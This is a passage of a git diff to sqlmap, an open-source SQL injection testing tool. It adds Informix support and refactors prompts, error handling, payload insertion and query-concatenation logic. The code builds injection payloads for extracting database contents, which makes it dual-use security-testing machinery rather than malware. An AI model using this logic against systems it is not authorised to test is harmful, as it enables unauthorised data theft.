[Y/n/q]" - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - pass - elif test[0] in ("n", "N"): + if choice == 'N': return False - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: raise @@ -648,11 +673,13 @@ def start(): raise except SqlmapBaseException, ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) if conf.multipleTargets: + _saveToResultsFile() + errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL") - logger.error(errMsg) + logger.error(errMsg.lstrip(", ")) else: logger.critical(errMsg) return False @@ -669,9 +696,10 @@ def start(): if kb.dataOutputFlag and not conf.multipleTargets: logger.info("fetched data logged to text files under '%s'" % conf.outputPath) - if conf.multipleTargets and conf.resultsFilename: - infoMsg = "you can find results of scanning in multiple targets " - infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename - logger.info(infoMsg) + if conf.multipleTargets: + if conf.resultsFilename: + infoMsg = "you can find results of scanning in multiple targets " + infoMsg += "mode inside the CSV file '%s'" % conf.resultsFilename + logger.info(infoMsg) return True diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 471070b1b..98f4dab40 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -1,13 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.common import Backend from lib.core.data import conf -from lib.core.data import logger +from lib.core.data import kb from lib.core.dicts import DBMS_DICT from lib.core.enums import DBMS from lib.core.settings import MSSQL_ALIASES @@ -21,6 +21,7 @@ from lib.core.settings import MAXDB_ALIASES from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import INFORMIX_ALIASES from lib.utils.sqlalchemy import SQLAlchemy from plugins.dbms.mssqlserver import MSSQLServerMap @@ -45,6 +46,8 @@ from plugins.dbms.db2 import DB2Map from plugins.dbms.db2.connector import Connector as DB2Conn from plugins.dbms.hsqldb import HSQLDBMap from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn +from plugins.dbms.informix import InformixMap +from plugins.dbms.informix.connector import Connector as InformixConn def setHandler(): """ @@ -64,26 +67,19 @@ def setHandler(): (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), + (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), ] - _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items) + _ = max(_ if (Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items) if _: items.remove(_) items.insert(0, _) for dbms, aliases, Handler, Connector in items: - if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases: - debugMsg = "skipping test for %s" % dbms - logger.debug(debugMsg) - continue - handler = Handler() conf.dbmsConnector = Connector() if conf.direct: - logger.debug("forcing timeout to 10 seconds") - conf.timeout = 10 - dialect = DBMS_DICT[dbms][3] if dialect: @@ -101,7 +97,12 @@ def setHandler(): 
conf.dbmsConnector.connect() if handler.checkDbms(): - conf.dbmsHandler = handler + if kb.resolutionDbms: + conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]() + else: + conf.dbmsHandler = handler + + conf.dbmsHandler._dbms = dbms break else: conf.dbmsConnector = None diff --git a/lib/core/__init__.py b/lib/core/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/core/__init__.py +++ b/lib/core/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/agent.py b/lib/core/agent.py index 556f379a9..e678627d4 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -17,6 +17,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage from lib.core.common import splitFields from lib.core.common import unArrayizeValue @@ -34,12 +35,15 @@ from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BOUNDARY_BACKSLASH_MARKER +from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import GENERIC_SQL_COMMENT +from lib.core.settings import NULL from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import REPLACEMENT_MARKER +from lib.core.settings import SLEEP_TIME_MARKER from lib.core.unescaper import unescaper class Agent(object): @@ -59,7 +63,7 @@ class Agent(object): if Backend.getIdentifiedDbms() in (DBMS.ORACLE,): # non-standard object(s) make problems to a database connector while returned (e.g. 
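# Small sketch of the handler-ordering tweak in setHandler() above: when a DBMS has already
# been identified (or strongly suggested by the extended heuristic check), its entry is moved
# to the front of the candidate list so that it is attempted first. Entries here are
# simplified (name, aliases) pairs instead of sqlmap's (dbms, aliases, Handler, Connector)
# tuples, and prioritize() is an illustrative helper.
def prioritize(items, identified):
    identified = (identified or "").lower()
    match = next((item for item in items if identified in item[1]), None)
    if match:
        items = [match] + [item for item in items if item is not match]
    return items

items = [("MySQL", ("mysql",)), ("PostgreSQL", ("postgresql", "pgsql")), ("Oracle", ("oracle", "ora"))]
print(prioritize(items, "PGSQL")[0][0])  # PostgreSQL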
XMLTYPE) _, _, _, _, _, _, fieldsToCastStr, _ = self.getFields(query) - for field in fieldsToCastStr.split(","): + for field in fieldsToCastStr.split(','): query = query.replace(field, self.nullAndCastField(field)) if kb.tamperFunctions: @@ -94,9 +98,12 @@ class Agent(object): paramDict = conf.paramDict[place] origValue = getUnicode(paramDict[parameter]) - if place == PLACE.URI: + if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue: paramString = origValue - origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0] + if place == PLACE.URI: + origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0] + else: + origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0) origValue = origValue[origValue.rfind('/') + 1:] for char in ('?', '=', ':'): if char in origValue: @@ -114,7 +121,7 @@ class Agent(object): elif place == PLACE.CUSTOM_HEADER: paramString = origValue origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0] - origValue = origValue[origValue.index(',') + 1:] + origValue = origValue[origValue.find(',') + 1:] match = re.search(r"([^;]+)=(?P[^;]+);?\Z", origValue) if match: origValue = match.group("value") @@ -124,9 +131,6 @@ class Agent(object): if header.upper() == HTTP_HEADER.AUTHORIZATION.upper(): origValue = origValue.split(' ')[-1].split(':')[-1] - if conf.prefix: - value = origValue - if value is None: if where == PAYLOAD.WHERE.ORIGINAL: value = origValue @@ -163,6 +167,9 @@ class Agent(object): newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER) retVal = paramString.replace(_, self.addPayloadDelimiters(newValue)) retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR) + elif BOUNDED_INJECTION_MARKER in paramDict[parameter]: + _ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER) + retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue))) elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST): retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue)) else: @@ -187,12 +194,12 @@ class Agent(object): if origValue: regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "") - retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString) else: - retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) if retVal == paramString and urlencode(parameter) != parameter: - retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString) if retVal: retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\') @@ -231,7 +238,7 @@ 
class Agent(object): # If we are replacing () the parameter original value with # our payload do not prepend with the prefix - if where == PAYLOAD.WHERE.REPLACE and not conf.prefix: + if where == PAYLOAD.WHERE.REPLACE: query = "" # If the technique is stacked queries () do not put a space @@ -275,7 +282,7 @@ class Agent(object): where = kb.injection.data[kb.technique].where if where is None else where comment = kb.injection.data[kb.technique].comment if comment is None else comment - if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT: + if Backend.getIdentifiedDbms() == DBMS.ACCESS and any((comment or "").startswith(_) for _ in ("--", "[GENERIC_SQL_COMMENT]")): comment = queries[DBMS.ACCESS].comment.query if comment is not None: @@ -289,7 +296,7 @@ class Agent(object): elif suffix and not comment: expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER) - return re.sub(r"(?s);\W*;", ";", expression) + return re.sub(r";\W*;", ";", expression) def cleanupPayload(self, payload, origValue=None): if payload is None: @@ -298,7 +305,7 @@ class Agent(object): _ = ( ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ - ("[HASH_REPLACE]", kb.chars.hash_), + ("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) @@ -308,8 +315,9 @@ class Agent(object): for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, randomStr()) - if origValue is not None: - payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if origValue is not None and "[ORIGVALUE]" in payload: + origValue = getUnicode(origValue) + payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) if "[INFERENCE]" in payload: if Backend.getIdentifiedDbms() is not None: @@ -337,7 +345,7 @@ class Agent(object): """ if payload: - payload = payload.replace("[SLEEPTIME]", str(conf.timeSec)) + payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec)) return payload @@ -445,7 +453,7 @@ class Agent(object): @rtype: C{str} """ - if not Backend.getDbms(): + if not Backend.getIdentifiedDbms(): return fields if fields.startswith("(CASE") or fields.startswith("(IIF") or fields.startswith("SUBSTR") or fields.startswith("MID(") or re.search(r"\A'[^']+'\Z", fields): @@ -480,7 +488,7 @@ class Agent(object): @rtype: C{str} """ - prefixRegex = r"(?:\s+(?:FIRST|SKIP)\s+\d+)*" + prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*" fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I) fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I) fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I) @@ -496,27 +504,33 @@ class Agent(object): if not _: fieldsSelectFrom = None + fieldsToCastStr = fieldsNoSelect + if fieldsSubstr: fieldsToCastStr = query elif fieldsMinMaxstr: - fieldsToCastStr = fieldsMinMaxstr.groups()[0] + fieldsToCastStr = fieldsMinMaxstr.group(1) elif fieldsExists: - fieldsToCastStr = fieldsSelect.groups()[0] + if fieldsSelect: + fieldsToCastStr = fieldsSelect.group(1) elif fieldsSelectTop: - fieldsToCastStr = fieldsSelectTop.groups()[0] + fieldsToCastStr = fieldsSelectTop.group(1) elif 
fieldsSelectRownum: - fieldsToCastStr = fieldsSelectRownum.groups()[0] + fieldsToCastStr = fieldsSelectRownum.group(1) elif fieldsSelectDistinct: - fieldsToCastStr = fieldsSelectDistinct.groups()[0] + if Backend.getDbms() in (DBMS.HSQLDB,): + fieldsToCastStr = fieldsNoSelect + else: + fieldsToCastStr = fieldsSelectDistinct.group(1) elif fieldsSelectCase: - fieldsToCastStr = fieldsSelectCase.groups()[0] + fieldsToCastStr = fieldsSelectCase.group(1) elif fieldsSelectFrom: fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query fieldsToCastStr = re.sub(r"\ASELECT%s\s+" % prefixRegex, "", fieldsToCastStr) elif fieldsSelect: - fieldsToCastStr = fieldsSelect.groups()[0] - else: - fieldsToCastStr = fieldsNoSelect + fieldsToCastStr = fieldsSelect.group(1) + + fieldsToCastStr = fieldsToCastStr or "" # Function if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr: @@ -584,7 +598,7 @@ class Agent(object): else: return query - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): + if Backend.isDbms(DBMS.MYSQL): if fieldsExists: concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1) concatenatedQuery += ",'%s')" % kb.chars.stop @@ -611,6 +625,7 @@ class Agent(object): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) + concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery) elif fieldsSelect: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop @@ -656,24 +671,23 @@ class Agent(object): concatenatedQuery = "'%s'&%s&'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop) else: - warnMsg = "applying generic concatenation with double pipes ('||')" + warnMsg = "applying generic concatenation (CONCAT)" singleTimeWarnMessage(warnMsg) if fieldsExists: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) - concatenatedQuery += "||'%s'" % kb.chars.stop + concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1) + concatenatedQuery += "),'%s')" % kb.chars.stop elif fieldsSelectCase: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||(SELECT " % kb.chars.start, 1) - concatenatedQuery += ")||'%s'" % kb.chars.stop + concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1) + concatenatedQuery += "),'%s')" % kb.chars.stop elif fieldsSelectFrom: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) - concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) + concatenatedQuery = "%s),'%s')%s" % (concatenatedQuery[:_].replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:]) elif fieldsSelect: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) - concatenatedQuery += "||'%s'" % kb.chars.stop + concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1) + concatenatedQuery += "),'%s')" % kb.chars.stop elif fieldsNoSelect: - concatenatedQuery = "'%s'||%s||'%s'" % (kb.chars.start, 
concatenatedQuery, kb.chars.stop) + concatenatedQuery = "CONCAT(CONCAT('%s',%s),'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop) return concatenatedQuery @@ -710,8 +724,11 @@ class Agent(object): if conf.uFrom: fromTable = " FROM %s" % conf.uFrom - else: - fromTable = fromTable or FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "") + elif not fromTable: + if kb.tableFrom: + fromTable = " FROM %s" % kb.tableFrom + else: + fromTable = FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "") if query.startswith("SELECT "): query = query[len("SELECT "):] @@ -744,6 +761,9 @@ class Agent(object): intoRegExp = intoRegExp.group(1) query = query[:query.index(intoRegExp)] + position = 0 + char = NULL + for element in xrange(0, count): if element > 0: unionQuery += ',' @@ -838,7 +858,7 @@ class Agent(object): if expression.find(queries[Backend.getIdentifiedDbms()].limitstring.query) > 0: _ = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query) else: - _ = expression.index("LIMIT ") + _ = re.search(r"\bLIMIT\b", expression, re.I).start() expression = expression[:_] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): @@ -881,12 +901,30 @@ class Agent(object): fromIndex = limitedQuery.index(" FROM ") untilFrom = limitedQuery[:fromIndex] fromFrom = limitedQuery[fromIndex + 1:] - orderBy = False + orderBy = None if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr + elif Backend.isDbms(DBMS.HSQLDB): + match = re.search(r"ORDER BY [^ ]+", limitedQuery) + if match: + limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip() + limitedQuery += " %s" % match.group(0) + + if query.startswith("SELECT "): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) + limitedQuery = limitedQuery.replace("SELECT ", "SELECT %s " % limitStr, 1) + else: + limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num) + limitedQuery += " %s" % limitStr + + if not match: + match = re.search(r"%s\s+(\w+)" % re.escape(limitStr), limitedQuery) + if match: + orderBy = " ORDER BY %s" % match.group(1) + elif Backend.isDbms(DBMS.FIREBIRD): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1) limitedQuery += " %s" % limitStr @@ -903,7 +941,7 @@ class Agent(object): else: limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr) - limitedQuery = limitedQuery % fromFrom + limitedQuery = safeStringFormat(limitedQuery, (fromFrom,)) limitedQuery += "=%d" % (num + 1) elif Backend.isDbms(DBMS.MSSQL): @@ -964,12 +1002,13 @@ class Agent(object): def forgeQueryOutputLength(self, expression): lengthQuery = queries[Backend.getIdentifiedDbms()].length.query - select = re.search("\ASELECT\s+", expression, re.I) - selectTopExpr = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I) + select = re.search(r"\ASELECT\s+", expression, re.I) + selectTopExpr = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I) + selectMinMaxExpr = re.search(r"\ASELECT\s+(MIN|MAX)\(.+?\)\s+FROM", expression, re.I) _, _, _, _, _, _, fieldsStr, _ = self.getFields(expression) - if selectTopExpr: + if selectTopExpr or selectMinMaxExpr: lengthExpr = lengthQuery % ("(%s)" % expression) elif select: lengthExpr = expression.replace(fieldsStr, lengthQuery % fieldsStr, 1) @@ -1033,7 +1072,7 @@ class Agent(object): """ _ = re.escape(PAYLOAD_DELIMITER) - return 
re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value + return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, getUnicode(payload), PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value def runAsDBMSUser(self, query): if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query: @@ -1041,5 +1080,20 @@ class Agent(object): return query + def whereQuery(self, query): + if conf.dumpWhere and query: + prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") + + if "%s)" % conf.tbl.upper() in prefix.upper(): + prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) + elif re.search(r"(?i)\bWHERE\b", prefix): + prefix += " AND %s" % conf.dumpWhere + else: + prefix += " WHERE %s" % conf.dumpWhere + + query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix + + return query + # SQL agent agent = Agent() diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 0e42433d8..d77613fb3 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -15,6 +15,7 @@ import os import sys import tempfile +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapSystemException from lib.core.settings import BIGARRAY_CHUNK_SIZE @@ -79,7 +80,7 @@ class BigArray(list): self.chunks[-1] = pickle.load(fp) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg return self.chunks[-1].pop() @@ -91,7 +92,7 @@ class BigArray(list): def _dump(self, chunk): try: - handle, filename = tempfile.mkstemp() + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY) self.filenames.add(filename) os.close(handle) with open(filename, "w+b") as fp: @@ -99,7 +100,7 @@ class BigArray(list): return filename except (OSError, IOError), ex: errMsg = "exception occurred while storing data " - errMsg += "to a temporary file ('%s'). Please " % ex + errMsg += "to a temporary file ('%s'). Please " % ex.message errMsg += "make sure that there is enough disk space left. 
If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" @@ -115,7 +116,7 @@ class BigArray(list): self.cache = Cache(index, pickle.load(fp), False) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg def __getstate__(self): diff --git a/lib/core/common.py b/lib/core/common.py old mode 100755 new mode 100644 index b72066c64..2446dcd63 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -23,8 +23,10 @@ import random import re import socket import string +import subprocess import sys import tempfile +import threading import time import urllib import urllib2 @@ -37,8 +39,6 @@ from StringIO import StringIO from difflib import SequenceMatcher from math import sqrt from optparse import OptionValueError -from subprocess import PIPE -from subprocess import Popen as execute from xml.dom import minidom from xml.sax import parse from xml.sax import SAXParseException @@ -72,6 +72,8 @@ from lib.core.enums import EXPECTED from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.enums import OPTION_TYPE from lib.core.enums import OS from lib.core.enums import PLACE from lib.core.enums import PAYLOAD @@ -86,10 +88,12 @@ from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException +from lib.core.exception import SqlmapValueException from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict from lib.core.settings import BANNER from lib.core.settings import BOLD_PATTERNS +from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK @@ -101,6 +105,7 @@ from lib.core.settings import DEFAULT_MSSQL_SCHEMA from lib.core.settings import DUMMY_USER_INJECTION from lib.core.settings import DYNAMICITY_MARK_LENGTH from lib.core.settings import ERROR_PARSING_REGEXES +from lib.core.settings import FILE_PATH_REGEXES from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME from lib.core.settings import FORM_SEARCH_REGEX from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES @@ -109,12 +114,14 @@ from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX from lib.core.settings import HASHDB_MILESTONE_VALUE from lib.core.settings import HOST_ALIASES +from lib.core.settings import IGNORE_SAVE_OPTIONS from lib.core.settings import INFERENCE_UNKNOWN_CHAR from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT from lib.core.settings import IP_ADDRESS_REGEX from lib.core.settings import ISSUES_PAGE from lib.core.settings import IS_WIN from lib.core.settings import LARGE_OUTPUT_THRESHOLD +from lib.core.settings import LOCALHOST from lib.core.settings import MIN_ENCODED_LEN_CHECK from lib.core.settings import MIN_TIME_RESPONSES from lib.core.settings import 
MIN_VALID_DELAYED_RESPONSE @@ -127,14 +134,17 @@ from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PLATFORM from lib.core.settings import PRINTABLE_CHAR_REGEX +from lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT from lib.core.settings import PYVERSION from lib.core.settings import REFERER_ALIASES from lib.core.settings import REFLECTED_BORDER_REGEX from lib.core.settings import REFLECTED_MAX_REGEX_PARTS from lib.core.settings import REFLECTED_REPLACEMENT_REGEX +from lib.core.settings import REFLECTED_REPLACEMENT_TIMEOUT from lib.core.settings import REFLECTED_VALUE_MARKER from lib.core.settings import REFLECTIVE_MISS_THRESHOLD from lib.core.settings import SENSITIVE_DATA_REGEX +from lib.core.settings import SENSITIVE_OPTIONS from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import TEXT_TAG_REGEX from lib.core.settings import TIME_STDEV_COEFF @@ -149,6 +159,7 @@ from lib.core.threads import getCurrentThreadData from lib.utils.sqlalchemy import _sqlalchemy from thirdparty.clientform.clientform import ParseResponse from thirdparty.clientform.clientform import ParseError +from thirdparty.colorama.initialise import init as coloramainit from thirdparty.magic import magic from thirdparty.odict.odict import OrderedDict from thirdparty.termcolor.termcolor import colored @@ -202,7 +213,7 @@ class Format(object): if versions is None and Backend.getVersionList(): versions = Backend.getVersionList() - return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(v for v in versions)) + return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(filter(None, versions))) @staticmethod def getErrorParsedDBMSes(): @@ -261,7 +272,7 @@ class Format(object): infoApi = {} if info and "type" in info: - if hasattr(conf, "api"): + if conf.api: infoApi["%s operating system" % target] = info else: infoStr += "%s operating system: %s" % (target, Format.humanize(info["type"])) @@ -279,12 +290,12 @@ class Format(object): infoStr += " (%s)" % Format.humanize(info["codename"]) if "technology" in info: - if hasattr(conf, "api"): + if conf.api: infoApi["web application technology"] = Format.humanize(info["technology"], ", ") else: infoStr += "\nweb application technology: %s" % Format.humanize(info["technology"], ", ") - if hasattr(conf, "api"): + if conf.api: return infoApi else: return infoStr.lstrip() @@ -300,7 +311,7 @@ class Backend: # Little precaution, in theory this condition should always be false elif kb.dbms is not None and kb.dbms != dbms: - warnMsg = "there seems to be a high probability that " + warnMsg = "there appears to be a high probability that " warnMsg += "this could be a false positive case" logger.warn(warnMsg) @@ -311,12 +322,14 @@ class Backend: msg += "correct [%s (default)/%s] " % (kb.dbms, dbms) while True: - _ = readInput(msg, default=kb.dbms) + choice = readInput(msg, default=kb.dbms) - if aliasToDbmsEnum(_) == kb.dbms: + if aliasToDbmsEnum(choice) == kb.dbms: + kb.dbmsVersion = [] + kb.resolutionDbms = kb.dbms break - elif aliasToDbmsEnum(_) == dbms: - kb.dbms = aliasToDbmsEnum(_) + elif aliasToDbmsEnum(choice) == dbms: + kb.dbms = aliasToDbmsEnum(choice) break 